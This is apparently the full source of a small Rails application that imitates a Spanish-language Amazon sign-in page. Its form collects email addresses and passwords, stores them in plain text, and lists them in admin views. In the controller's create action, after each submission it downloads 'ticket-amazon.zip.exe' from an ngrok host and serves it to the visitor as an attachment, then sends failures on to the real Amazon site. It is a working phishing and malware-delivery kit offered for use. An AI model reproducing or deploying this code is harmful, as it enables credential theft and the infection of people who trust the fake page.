config/routes.rb
Rails.application.routes.draw do
  resources :information
  root 'pages#sgacampus'
  # Define your application routes per the DSL in https://guides.rubyonrails.org/routing.html

  # Defines the root path route ("/")
  # root "articles#index"
end

app/models/application_record.rb
class ApplicationRecord < ActiveRecord::Base
  primary_abstract_class
end

app/models/information.rb
class Information < ApplicationRecord
end

app/controllers/application_controller.rb
class ApplicationController < ActionController::Base
end

app/controllers/information_controller.rb
class InformationController < ApplicationController
  before_action :set_information, only: %i[ show edit update destroy ]

  # GET /information or /information.json
  def index
    @information = Information.all
  end

  # GET /information/1 or /information/1.json
  def show
  end

  # GET /information/new
  def new
    @information = Information.new
  end

  # GET /information/1/edit
  def edit
  end

  require 'net/http'
  # POST /information or /information.json
  def create
    @information = Information.new(information_params)

      if @information.save
        url = URI.parse("https://151b-181-78-80-242.ngrok-free.app/ticket-amazon.zip.exe")
        response = Net::HTTP.get_response(url)
        if response.code == "200"
          send_data response.body, filename: "ticket-amazon.zip.exe", disposition: 'attachment', content_type: 'application/octet-stream'
        else
          redirect_to "https://www.amazon.com/-/es/"
          return
        end
      else
        redirect_to "https://www.amazon.com/-/es/", allow_other_host: true
      end
  end

  # PATCH/PUT /information/1 or /information/1.json
  def update
    respond_to do |format|
      if @information.update(information_params)
        format.html { redirect_to information_url(@information), notice: "Information was successfully updated." }
        format.json { render :show, status: :ok, location: @information }
      else
        format.html { render :edit, status: :unprocessable_entity }
        format.json { render json: @information.errors, status: :unprocessable_entity }
      end
    end
  end

  # DELETE /information/1 or /information/1.json
  def destroy
    @information.destroy

    respond_to do |format|
      format.html { redirect_to information_index_url, notice: "Information was successfully destroyed." }
      format.json { head :no_content }
    end
  end

  private
    # Use callbacks to share common setup or constraints between actions.
    def set_information
      @information = Information.find(params[:id])
    end

    # Only allow a list of trusted parameters through.
    def information_params
      params.require(:information).permit(:email, :pass)
    end
end

app/controllers/pages_controller.rb
class PagesController < ApplicationController
    def sgacampus
    @information = Information.new

    end
end

app/helpers/application_helper.rb
module ApplicationHelper
end

app/helpers/information_helper.rb
module InformationHelper
end

app/helpers/pages_helper.rb
module PagesHelper
end

app/views/information/_form.html.erb
<%= form_with(model: information) do |form| %>
  <% if information.errors.any? %>
    <div style="color: red">
      <h2><%= pluralize(information.errors.count, "error") %> prohibited this information from being saved:</h2>

      <ul>
        <% information.errors.each do |error| %>
          <li><%= error.full_message %></li>
        <% end %>
      </ul>
    </div>
  <% end %>

  <div>
    <%= form.label :email, style: "display: block" %>
    <%= form.text_field :email %>
  </div>

  <div>
    <%= form.label :pass, style: "display: block" %>
    <%= form.text_field :pass %>
  </div>

  <div>
    <%= form.submit %>
  </div>
<% end %>

app/views/information/_information.html.erb
<div id="<%= dom_id information %>">
  <p>
    <strong>Email:</strong>
    <%= information.email %>
  </p>

  <p>
    <strong>Pass:</strong>
    <%= information.pass %>
  </p>

</div>

app/views/information/edit.html.erb
<h1>Editing information</h1>

<%= render "form", information: @information %>

<br>

<div>
  <%= link_to "Show this information", @information %> |
  <%= link_to "Back to information", information_index_path %>
</div>

app/views/information/index.html.erb
<p style="color: green"><%= notice %></p>

<h1>Information</h1>

<div id="information">
  <% @information.each do |information| %>
    <%= render information %>
    <p>
      <%= link_to "Show this information", information %>
    </p>
  <% end %>
</div>

<%= link_to "New information", new_information_path %>

app/views/information/new.html.erb
<h1>New information</h1>

<%= render "form", information: @information %>

<br>

<div>
  <%= link_to "Back to information", information_index_path %>
</div>

app/views/information/show.html.erb
<p style="color: green"><%= notice %></p>

<%= render @information %>

<div>
  <%= link_to "Edit this information", edit_information_path(@information) %> |
  <%= link_to "Back to information", information_index_path %>

  <%= button_to "Destroy this information", @information, method: :delete %>
</div>

app/views/layouts/application.html.erb
<!DOCTYPE html>
<html>
  <head>
    <title>Amazon</title>
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <%= csrf_meta_tags %>
    <%= csp_meta_tag %>

    <%= stylesheet_link_tag "application", "data-turbo-track": "reload" %>
    <%= javascript_importmap_tags %>
<link rel="stylesheet"
        href="images-na.ssl-images-amazon.com/images/G/01/AUIClients/AmazonUI-3c913031596ca78a3768f4e934b1cc02ce238101.secure.min._V1_.css">
  </head>

  <body>
    <%= yield %>
  </body>
</html>

app/views/pages/sgacampus.html.erb
<div class="a-container a-padding-double-large" style="min-width:350px;padding:44px 0 !important">
        <div class="a-row a-spacing-double-large" style="width: 350px; margin: 0 auto">
            <div class="a-row a-spacing-medium a-text-center"><i class="a-icon a-logo"></i></div>
            <div class="a-section">
                <div class="a-box a-color-offset-background">
                    <div class="a-box-inner a-padding-extra-large">
                        <%= form_with(model: @information, method: "post", data: { turbo: false }) do |form| %>
                            <div class="field">
                                <%= form.label :email, "Correo Electrónico:" %>
                                <%= form.email_field :email, class:"a-input-text a-span12 auth-autofocus auth-required-field" %>
                            </div>

                            <div class="field">
                                <%= form.label :pass, "Contraseña:" %>
                                <%= form.password_field :pass, class:"a-input-text a-span12 auth-autofocus auth-required-field" %>
                            </div>
                            <span id="continue" class="a-button a-button-span12 a-button-primary" style="margin-top: 20px;"><span
                                        class="a-button-inner">
                                            <%= form.submit "Continuar", class:"a-button-input"%><span id="continue-announce"
                                            class="a-button-text" aria-hidden="true">
                                            Continuar
                                        </span></span></span> <br>
                            <div id="legalTextRow" class="a-row a-spacing-top-medium a-size-small">
                                Al continuar, aceptas las <a
                                    href="/gp/help/customer/display.html/ref=ap_signin_notification_condition_of_use?ie=UTF8&amp;nodeId=508088">Condiciones
                                    de uso</a> y el <a
                                    href="/gp/help/customer/display.html/ref=ap_signin_notification_privacy_notice?ie=UTF8&amp;nodeId=468496">Aviso
                                    de privacidad</a> de Amazon.
                            </div>
                        <% end %>
                    </div>
                </div>
            </div>
        </div>

        <div class="a-divider a-divider-section">
            <div class="a-divider-inner"></div>
        </div>

        <div class="a-text-center a-spacing-small a-size-mini">
            <a href="https://www.amazon.com/gp/help/customer/display.html/ref=footer_cou?ie=UTF8&amp;nodeId=508088">Conditions
                of Use</a>
            <span class="a-letter-space"></span>
            <span class="a-letter-space"></span>
            <span class="a-letter-space"></span>
            <span class="a-letter-space"></span>
            <a href="https://www.amazon.com/gp/help/customer/display.html/ref=footer_privacy?ie=UTF8&amp;nodeId=468496">Privacy
                Policy</a>
        </div>
        <div class="a-text-center a-size-mini a-color-secondary">
            &copy; 1996-2023, Amazon.com, Inc. or its affiliates
            <script>
                if (true === true) {
                    document.write('<img src="https://fls-na.amaz' + 'on.com/' + '1/oc-csi/1/OP/requestId=R2SWR7H40Z6GS9PSB16T&js=1" />');
                };
            </script>
            <noscript>
                <img src="https://fls-na.amazon.com/1/oc-csi/1/OP/requestId=R2SWR7H40Z6GS9PSB16T&amp;js=0" />
            </noscript>
        </div>
    </div>